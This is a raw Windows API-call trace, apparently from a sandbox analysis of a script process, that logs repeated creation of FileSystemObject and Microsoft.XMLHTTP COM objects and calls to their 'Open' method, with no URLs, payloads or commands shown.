	[0279.995] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0279.997] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0279.997] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0279.997] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0279.997] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0279.997] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0279.997] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0281.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0281.130] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0281.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0281.132] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0281.132] SysStringLen (param_1=0x0) returned 0x0
	[0281.132] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0281.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0281.132] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0281.132] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0281.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0281.132] ??2@YAPEAX_K@Z () returned 0x62f310
	[0281.132] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0281.132] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0281.132] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0281.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0281.132] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0281.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0281.132] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0281.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0281.135] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0281.135] SysStringLen (param_1=0x0) returned 0x0
	[0281.135] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0281.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0281.135] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0281.135] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0281.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0281.135] ??2@YAPEAX_K@Z () returned 0x62f330
	[0281.135] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0281.135] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0281.135] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0281.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0281.136] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0281.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0281.136] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0281.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0281.136] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0281.136] SysStringLen (param_1=0x0) returned 0x0
	[0281.136] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0281.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0281.136] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0281.136] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0281.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0281.136] ??2@YAPEAX_K@Z () returned 0x62f310
	[0281.136] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0281.136] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0281.136] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0281.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0281.137] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0281.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0281.137] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0281.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0281.137] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0281.137] SysStringLen (param_1=0x0) returned 0x0
	[0281.137] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0281.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0281.137] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0281.137] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0281.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0281.137] ??2@YAPEAX_K@Z () returned 0x62f330
	[0281.137] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0281.137] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0281.137] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0281.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0281.138] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0281.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0281.138] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0281.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0281.138] longjmp () 
	[0281.138] longjmp () 
	[0281.138] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0281.138] SysStringLen (param_1=0x0) returned 0x0
	[0281.138] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0281.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0281.138] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0281.138] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0281.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7238) returned 0x0
	[0281.139] ??2@YAPEAX_K@Z () returned 0x62f310
	[0281.139] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7238, pUnkSite=0x62f310) 
	[0281.139] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0281.139] XMLHTTPRequest:IUnknown:Release (This=0x49c7238) returned 0x0
	[0281.139] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0281.139] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0281.139] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0281.139] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0281.139] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0281.139] longjmp () 
	[0281.139] longjmp () 
	[0281.140] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0281.140] SysStringLen (param_1=0x0) returned 0x0
	[0281.140] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0281.140] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0281.140] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0281.140] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0281.140] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0281.140] ??2@YAPEAX_K@Z () returned 0x62f330
	[0281.140] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
